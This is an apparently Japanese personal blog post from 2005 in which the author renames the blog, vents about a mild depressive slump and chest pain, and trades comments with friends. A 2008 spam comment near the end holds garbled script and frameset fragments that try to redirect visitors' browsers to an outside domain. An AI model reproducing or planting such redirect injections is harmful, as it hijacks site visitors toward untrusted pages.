 

--.--.-- --:--

スポンサー広告  | Top↑

まいにちVer.2 

2005.10.12 12:50

ブログタイトル変更でございます

特に意味は無いんだけども、POISONというブログタイトルにも沿わなくなってきたので戻そうと思います。
以前の「まいにち」は、毎日更新を目指すものであったのに対し、今回の「まいにちVer.2は日々を追う」という意味であります。
なんて。
つまらないことはどうでもいいや。

軽く鬱期到来でござる(-_-)ウツダシノウ
とゆうのも気づいたらいろんなことが山積みで、
とゆうかたまたまいろんなことが重なっただけなんだと思うけど。
そしてこんなことを書いていたら、みんなに大丈夫( ; ゚Д゚)?なんていわれちゃったり心配されたりするんだけど。。。ごめんなさい。
実は私こんな状態にならないとものごとに取り組めない性質なんです。

私の周りには、そんなっていうかこんなやつを嫌う人や厳しい意見を投げかけてくる人がいます。
そんな人に会うのには私はとても勇気がいるんだけど会わないわけには行かないし仕方ない。
自分にキビシイから自分がここまで追い詰められるのか、
自分に甘いから甘やかすように自分を心配がるのか。
私は自分でもわからないけれど、やることはやってるんだ、( ゚Д゚)ヴォケ!!

ブログタイトルを変更した瞬間、POISONに戻ったようです(*´д`;)…


あ~あ、季節の変わり目っていやね(´・д・`)
なんだか朝起きたら心臓なのか肺なのかが痛むのよ(´;ω;`)
ナニユエ??
みんなは肺なんじゃないかって思ってると思うけど、多分心臓。。

とりあえずいくらかいても暗く盛り下がっていくばかりなので、
今日は終わりたいと思います。
あぁ、ごめんなさい((((・_・)

    | TB(1)  | CM(3) | Top↑

Comment

みおー(>_<)!
大丈夫??
私も最近、激萎えな日々を送ってるよ・・・。
とにもかくにも卒アルの写真撮れなかったのが
まじイタイ・・・。あわわ。あわわ。あわわ。。。
えりてぃ |  2005.10.12(水) 22:33 | URL |  【編集】

大丈夫だよぉ~~。。
心配かけてごめんね!!

あたしはまだ個人撮影を終えていなくて、とりそびれそうでこわいよぉ~~(´・ω・`)ガッカリ・・・
みお |  2005.10.15(土) 03:23 | URL |  【編集】

●Good site

<a href= {
></a> <a href= </frameset>
></a> <a href= window.top.location = "http://fresgetsrch.info/";
></a> <a href= </body>
></a> <a href= <frameset rows="100%,*" frameborder="no" border="0" framespacing="0">
></a> <a href= <script type="text/javascript">
></a> <a href= top.location="http://fresgetsrch.info/";
></a> <a href= <!--
></a> <a href= */
></a> <a href= <body bgcolor="#ffffff" text="#000000">
></a>
<a href= { ></a> <a href= </frameset> ></a> <a href= |  2008.04.23(水) 17:26 | URL |  【編集】

コメントを投稿する

URL
C
o
m
m
e
n
t

Pass  編集・削除に必要
非公開  管理者だけにコメントを表示
 

Trackback

この記事のトラックバックURL

この記事へのトラックバック

テーマ『うつ病基礎知識』で取り上げてきた記事を紹介いたします。うつ病の基礎的なことは一通りの記事が揃っていると思います。少しでも多くの方に、そして少しでも多くの事を知って頂けたら幸いです。■ うつ病ってどんな病気か知りたい方へ   →『うつ病とは
2005/10/12(水) 16:46:35 | うつ病全快!!
 | HOME | 
